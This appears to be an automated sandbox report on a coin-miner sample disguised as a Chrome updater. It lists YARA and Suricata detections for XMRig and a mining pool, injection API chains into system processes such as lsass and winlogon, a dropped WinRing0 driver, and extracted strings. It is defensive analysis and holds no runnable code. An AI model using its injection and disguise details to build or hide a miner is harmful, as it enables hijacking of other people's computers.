                Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000011.00000002.2626315265.000002062802B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1413437595.000002062802B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: updater.exe, 00000014.00000002.1586148880.00007FF6DD49B000.00000004.00000001.01000000.00000008.sdmp
                Source: Binary string: (@C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000011.00000002.2626315265.000002062802B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1413437595.000002062802B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb*6 source: svchost.exe, 00000011.00000000.1413550967.0000020628056000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2628917838.0000020628056000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000011.00000000.1413550967.0000020628056000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2628917838.0000020628056000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: wz.pdB source: h2qWqtD73F.exe, 00000000.00000002.1416245582.00000200354F0000.00000004.00000001.00020000.00000000.sdmp, h2qWqtD73F.exe, 00000000.00000000.1297247842.00007FF752A5B000.00000008.00000001.01000000.00000003.sdmp, h2qWqtD73F.exe, 00000000.00000002.1417375531.00007FF752A80000.00000008.00000001.01000000.00000003.sdmp, updater.exe, 00000014.00000000.1417205334.00007FF6DD49B000.00000008.00000001.01000000.00000008.sdmp
                Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000011.00000002.2626315265.000002062802B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.error source: svchost.exe, 00000011.00000000.1413550967.0000020628056000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2628917838.0000020628056000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: \user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A583109edcd source: svchost.exe, 00000011.00000002.2628095786.0000020628040000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1413494043.0000020628040000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000011.00000000.1413550967.0000020628056000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2628917838.0000020628056000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831~1 source: svchost.exe, 00000011.00000002.2628095786.0000020628040000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1413494043.0000020628040000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbF source: svchost.exe, 00000011.00000002.2628095786.0000020628040000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1413494043.0000020628040000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.error source: svchost.exe, 00000011.00000000.1413550967.0000020628056000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2628917838.0000020628056000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000011.00000002.2626315265.000002062802B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1413437595.000002062802B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: wz.pdBk source: h2qWqtD73F.exe, 00000000.00000002.1416245582.00000200354F0000.00000004.00000001.00020000.00000000.sdmp, h2qWqtD73F.exe, 00000000.00000000.1297247842.00007FF752A5B000.00000008.00000001.01000000.00000003.sdmp, h2qWqtD73F.exe, 00000000.00000002.1417375531.00007FF752A80000.00000008.00000001.01000000.00000003.sdmp, updater.exe, 00000014.00000000.1417205334.00007FF6DD49B000.00000008.00000001.01000000.00000008.sdmp
                Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831d0 source: svchost.exe, 00000011.00000000.1413550967.0000020628056000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2628917838.0000020628056000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdbl source: svchost.exe, 00000011.00000002.2626315265.000002062802B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1413437595.000002062802B000.00000004.00000001.00020000.00000000.sdmp
                Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000002EA8A69BE3C FindFirstFileExW,8_2_000002EA8A69BE3C
                Source: C:\Windows\System32\lsass.exeCode function: 9_2_000001CB338EBE3C FindFirstFileExW,9_2_000001CB338EBE3C
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000026E027CBE3C FindFirstFileExW,10_2_0000026E027CBE3C
                Source: C:\Windows\System32\dwm.exeCode function: 11_2_000001C6CEF1BE3C FindFirstFileExW,11_2_000001C6CEF1BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 12_2_0000025304FBBE3C FindFirstFileExW,12_2_0000025304FBBE3C
                Source: C:\Windows\System32\svchost.exeCode function: 13_2_0000016C2116BE3C FindFirstFileExW,13_2_0000016C2116BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 13_2_0000016C211CBE3C FindFirstFileExW,13_2_0000016C211CBE3C
                Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000026F4814BE3C FindFirstFileExW,14_2_0000026F4814BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_0000029B9234BE3C FindFirstFileExW,15_2_0000029B9234BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_0000029B923ABE3C FindFirstFileExW,15_2_0000029B923ABE3C
                Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000020422AABE3C FindFirstFileExW,16_2_0000020422AABE3C
                Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000206287BBE3C FindFirstFileExW,17_2_00000206287BBE3C
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeCode function: 20_2_000002847139BE3C FindFirstFileExW,20_2_000002847139BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001829254BE3C FindFirstFileExW,21_2_000001829254BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 24_2_000001BB3DA6BE3C FindFirstFileExW,24_2_000001BB3DA6BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000029ABCF4BE3C FindFirstFileExW,25_2_0000029ABCF4BE3C
                Source: C:\Windows\System32\conhost.exeCode function: 28_2_0000025E81DDBE3C FindFirstFileExW,28_2_0000025E81DDBE3C
                Source: C:\Windows\System32\svchost.exeCode function: 29_2_000001CD9AD8BE3C FindFirstFileExW,29_2_000001CD9AD8BE3C
                Source: C:\Windows\System32\svchost.exeCode function: 31_2_000002AF8C39BE3C FindFirstFileExW,31_2_000002AF8C39BE3C
                Source: Network trafficSuricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.11:63517 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.11:49871 -> 142.202.242.43:80
                Source: lsass.exe, 00000009.00000000.1348006527.000001CB32A89000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert
                Source: lsass.exe, 00000009.00000000.1348296101.000001CB33084000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2649685111.000001CB33084000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertG
                Source: lsass.exe, 00000009.00000002.2648734905.000001CB33073000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1348267728.000001CB33073000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2654483862.000001CB331C1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1348472435.000001CB331C1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                Source: lsass.exe, 00000009.00000000.1348296101.000001CB33084000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2649685111.000001CB33084000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                Source: updater.exe, 00000014.00000002.1586148880.00007FF6DD49B000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
                Source: updater.exe, 00000014.00000002.1586148880.00007FF6DD49B000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
                Source: updater.exe, 00000014.00000002.1586148880.00007FF6DD49B000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
                Source: updater.exe, 00000014.00000002.1586148880.00007FF6DD49B000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
                Source: powershell.exe, 00000006.00000002.1404686932.0000022851D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mC&
                Source: lsass.exe, 00000009.00000000.1348296101.000001CB33084000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2649685111.000001CB33084000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                Source: lsass.exe, 00000009.00000002.2648734905.000001CB33073000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1348267728.000001CB33073000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2654483862.000001CB331C1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1348472435.000001CB331C1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                Source: lsass.exe, 00000009.00000000.1348296101.000001CB33084000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                Source: lsass.exe, 00000009.00000002.2648734905.000001CB33073000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1348267728.000001CB33073000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2654483862.000001CB331C1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1348472435.000001CB331C1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                Source: lsass.exe, 00000009.00000002.2639344959.000001CB32A89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1348006527.000001CB32A89000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                Source: lsass.exe, 00000009.00000002.2645746107.000001CB33000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1348175734.000001CB33000000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                Source: lsass.exe, 00000009.00000002.2636409774.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1347929432.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
                Source: lsass.exe, 00000009.00000002.2637267063.000001CB32A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1347954124.000001CB32A4E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
                Source: lsass.exe, 00000009.00000002.2636409774.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1347929432.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                Source: powershell.exe, 00000006.00000002.1396657039.0000022849456000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: lsass.exe, 00000009.00000000.1348296101.000001CB33084000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2648734905.000001CB33073000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1348267728.000001CB33073000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2654483862.000001CB331C1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2649685111.000001CB33084000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1348006527.000001CB32A89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1348472435.000001CB331C1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: lsass.exe, 00000009.00000000.1348296101.000001CB33084000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                Source: lsass.exe, 00000009.00000000.1348296101.000001CB33084000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1348006527.000001CB32A89000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                Source: powershell.exe, 00000006.00000002.1373300100.0000022839608000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000006.00000002.1373300100.0000022839608000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: lsass.exe, 00000009.00000002.2636409774.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1347929432.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                Source: lsass.exe, 00000009.00000002.2636409774.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1347929432.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                Source: powershell.exe, 00000006.00000002.1373300100.00000228393E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: lsass.exe, 00000009.00000002.2637267063.000001CB32A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2636409774.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1347929432.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1347954124.000001CB32A4E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
                Source: powershell.exe, 00000006.00000002.1373300100.0000022839608000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2636409774.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1347929432.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                Source: lsass.exe, 00000009.00000002.2636409774.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1347929432.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
                Source: lsass.exe, 00000009.00000002.2636409774.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1347929432.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
                Source: lsass.exe, 00000009.00000002.2636409774.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1347929432.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/P
                Source: powershell.exe, 00000006.00000002.1373300100.0000022839608000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000006.00000002.1404686932.0000022851E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                Source: powershell.exe, 00000006.00000002.1404686932.0000022851E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.np
                Source: powershell.exe, 00000006.00000002.1373300100.00000228393E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000006.00000002.1373300100.0000022839608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1403630784.0000022851A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                Source: powershell.exe, 00000006.00000002.1396657039.0000022849456000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000006.00000002.1396657039.0000022849456000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000006.00000002.1396657039.0000022849456000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000006.00000002.1373300100.0000022839608000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000006.00000002.1396657039.0000022849456000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: updater.exe, 00000014.00000002.1586148880.00007FF6DD49B000.00000004.00000001.01000000.00000008.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms

                Operating System Destruction

                barindex
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeProcess information set: 01 00 00 00 Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeProcess information set: 01 00 00 00 Jump to behavior

                System Summary

                barindex
                Source: 20.2.updater.exe.7ff6dd49ea80.7.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: 20.2.updater.exe.7ff6dd49ea80.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                Source: 20.2.updater.exe.7ff6dd49ea80.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                Source: 20.2.updater.exe.7ff6dd480000.4.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: 20.2.updater.exe.7ff6dd480000.4.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                Source: 20.2.updater.exe.7ff6dd480000.4.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                Source: 20.2.updater.exe.7ff6dd4bfc40.5.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: 20.2.updater.exe.7ff6dd4bfc40.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                Source: 20.2.updater.exe.7ff6dd4bfc40.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                Source: 20.2.updater.exe.7ff6dd4e1860.6.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: 20.2.updater.exe.7ff6dd4e1860.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                Source: 20.2.updater.exe.7ff6dd4e1860.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                Source: 00000014.00000002.1586148880.00007FF6DD49B000.00000004.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: Process Memory Space: updater.exe PID: 7012, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: C:\Windows\System32\dialer.exeCode function: 5_2_00007FF67E6C10C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,5_2_00007FF67E6C10C0
                Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000002EA8A692A7C NtEnumerateValueKey,NtEnumerateValueKey,8_2_000002EA8A692A7C
                Source: C:\Windows\System32\lsass.exeCode function: 9_2_000001CB338E26F0 NtQueryDirectoryFileEx,GetFileType,StrCpyW,9_2_000001CB338E26F0
                Source: C:\Windows\System32\lsass.exeCode function: 9_2_000001CB338E21CC NtQuerySystemInformation,StrCmpNIW,9_2_000001CB338E21CC
                Source: C:\Windows\System32\dwm.exeCode function: 11_2_000001C6CEF12A7C NtEnumerateValueKey,NtEnumerateValueKey,11_2_000001C6CEF12A7C
                Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000020422AA23F0 GetProcessIdOfThread,GetCurrentProcessId,CreateFileW,WriteFile,ReadFile,CloseHandle,NtResumeThread,16_2_0000020422AA23F0
                Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000020422AA21CC NtQuerySystemInformation,StrCmpNIW,16_2_0000020422AA21CC
                Source: C:\Windows\System32\dialer.exeCode function: 26_2_00007FF6101910C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,26_2_00007FF6101910C0
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeFile created: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sysJump to behavior
                Source: C:\Windows\System32\dialer.exeCode function: 5_2_00007FF67E6C23285_2_00007FF67E6C2328
                Source: C:\Windows\System32\dialer.exeCode function: 5_2_00007FF67E6C14E45_2_00007FF67E6C14E4
                Source: C:\Windows\System32\dialer.exeCode function: 5_2_00007FF67E6C1DB45_2_00007FF67E6C1DB4
                Source: C:\Windows\System32\dialer.exeCode function: 5_2_00007FF67E6C26E85_2_00007FF67E6C26E8
                Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000002EA8A66B0308_2_000002EA8A66B030
                Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000002EA8A6620DC8_2_000002EA8A6620DC
                Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000002EA8A6716588_2_000002EA8A671658
                Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000002EA8A66B23C8_2_000002EA8A66B23C
                Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000002EA8A66F2F88_2_000002EA8A66F2F8
                Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000002EA8A69BC308_2_000002EA8A69BC30
                Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000002EA8A692CDC8_2_000002EA8A692CDC
                Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000002EA8A6A22588_2_000002EA8A6A2258
                Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000002EA8A69BE3C8_2_000002EA8A69BE3C
                Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000002EA8A69FEF88_2_000002EA8A69FEF8
                Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000002EA8A6EB0308_2_000002EA8A6EB030
                Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000002EA8A6E20DC8_2_000002EA8A6E20DC
                Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000002EA8A6F16588_2_000002EA8A6F1658
                Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000002EA8A6EB23C8_2_000002EA8A6EB23C
                Source: C:\Windows\System32\winlogon.exeCode function: 8_2_000002EA8A6EF2F88_2_000002EA8A6EF2F8
                Source: C:\Windows\System32\lsass.exeCode function: 9_2_000001CB338BB0309_2_000001CB338BB030
                Source: C:\Windows\System32\lsass.exeCode function: 9_2_000001CB338BF2F89_2_000001CB338BF2F8
                Source: C:\Windows\System32\lsass.exeCode function: 9_2_000001CB338BB23C9_2_000001CB338BB23C
                Source: C:\Windows\System32\lsass.exeCode function: 9_2_000001CB338C16589_2_000001CB338C1658
                Source: C:\Windows\System32\lsass.exeCode function: 9_2_000001CB338B20DC9_2_000001CB338B20DC
                Source: C:\Windows\System32\lsass.exeCode function: 9_2_000001CB338EBC309_2_000001CB338EBC30
                Source: C:\Windows\System32\lsass.exeCode function: 9_2_000001CB338EFEF89_2_000001CB338EFEF8
                Source: C:\Windows\System32\lsass.exeCode function: 9_2_000001CB338EBE3C9_2_000001CB338EBE3C
                Source: C:\Windows\System32\lsass.exeCode function: 9_2_000001CB338F22589_2_000001CB338F2258
                Source: C:\Windows\System32\lsass.exeCode function: 9_2_000001CB338E2CDC9_2_000001CB338E2CDC
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000026E0279F2F810_2_0000026E0279F2F8
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000026E0279B03010_2_0000026E0279B030
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000026E027920DC10_2_0000026E027920DC
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000026E027A165810_2_0000026E027A1658
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000026E0279B23C10_2_0000026E0279B23C
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000026E027CFEF810_2_0000026E027CFEF8
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000026E027CBC3010_2_0000026E027CBC30
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000026E027C2CDC10_2_0000026E027C2CDC
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000026E027D225810_2_0000026E027D2258
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000026E027CBE3C10_2_0000026E027CBE3C
                Source: C:\Windows\System32\dwm.exeCode function: 11_2_000001C6CEEE20DC11_2_000001C6CEEE20DC
                Source: C:\Windows\System32\dwm.exeCode function: 11_2_000001C6CEEEB03011_2_000001C6CEEEB030
                Source: C:\Windows\System32\dwm.exeCode function: 11_2_000001C6CEEEF2F811_2_000001C6CEEEF2F8
                Source: C:\Windows\System32\dwm.exeCode function: 11_2_000001C6CEEF165811_2_000001C6CEEF1658
                Source: C:\Windows\System32\dwm.exeCode function: 11_2_000001C6CEEEB23C11_2_000001C6CEEEB23C
                Source: C:\Windows\System32\dwm.exeCode function: 11_2_000001C6CEF12CDC11_2_000001C6CEF12CDC
                Source: C:\Windows\System32\dwm.exeCode function: 11_2_000001C6CEF1BC3011_2_000001C6CEF1BC30
                Source: C:\Windows\System32\dwm.exeCode function: 11_2_000001C6CEF1FEF811_2_000001C6CEF1FEF8
                Source: C:\Windows\System32\dwm.exeCode function: 11_2_000001C6CEF2225811_2_000001C6CEF22258
                Source: C:\Windows\System32\dwm.exeCode function: 11_2_000001C6CEF1BE3C11_2_000001C6CEF1BE3C
                Source: C:\Windows\System32\dwm.exeCode function: 11_2_000001C6CEF420DC11_2_000001C6CEF420DC
                Source: C:\Windows\System32\dwm.exeCode function: 11_2_000001C6CEF4B03011_2_000001C6CEF4B030
                Source: C:\Windows\System32\dwm.exeCode function: 11_2_000001C6CEF4F2F811_2_000001C6CEF4F2F8
                Source: C:\Windows\System32\dwm.exeCode function: 11_2_000001C6CEF5165811_2_000001C6CEF51658
